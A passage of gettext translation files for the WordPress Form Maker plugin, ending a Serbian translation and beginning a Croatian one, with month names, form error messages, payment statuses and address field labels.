#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Септембар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Октобар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Новембар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Децембар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Грешка, погрешно Сигурносна аифра."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Ваш ИП је на црној листи. Молимо контактирајте администратора сајта"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Датотека прелази дозвољену величину"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Жао нам је, није вам дозвољено да отпремите овог типа датотеке."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Грешка, фајл не може бити померен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Ово поље %s захтева јединствену вредност улаз и то је већ поднет."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Грешка, е-маил није послат."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ништа није поднет."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Ваш образац успешно прослеђен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Грешка, е-маил није послат."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Ваша емаил адреса је већ проверен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ваша емаил је успешно проверен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Ваш верификацију е-маил је истекло."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Верификација веза је неважећи."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "поље је обавезно."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Ово није валидна емаил адреса."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Не можете да изаберете бивше датуме. Изаберите датум почевши од садашњег."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Вредност мора бити између "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Количина"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Ваша оцена треба да буде мањи од "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Наслов"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Први"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Последњи"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Средина"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Позивни број"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Број телефона"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Долара"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Центи"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Из"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Да"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "иди "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Ресет "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Изабрали поље"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Изаберите датум"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-hr.po000060400000056615152434416630011624 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:57+0400\n"
"PO-Revision-Date: 2015-05-22 16:57+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: hr\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Ulica"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Ulica Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Grad"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Država / Pokrajina / regija"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Poštanski broj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Država"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Siječanj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Veljača"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Ožujak"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Travanj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Svibanj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Lipanj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Srpanj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Kolovoz"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Rujan"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Listopad"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Studeni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Prosinac"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Pogreška, pogrešan sigurnosni kod."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Vaš IP je na crnoj listi. Obratite se administratoru web stranice. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "File prelazi dozvoljenu veličinu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Nažalost, ne mogu učitati ovu vrstu datoteke."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Pogreške, datoteka ne može biti premještena."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Ovo polje %s zahtijeva jedinstven unos, a ta vrijednost je već bio podnesen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Greška, e-mail nije poslana."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ništa nije podnesen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Obrazac uspješno poslan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Greška, e-mail nije poslana."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Vaša e-mail adresa je već potvrđena."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Vaša e-mail je uspješno potvrđena."

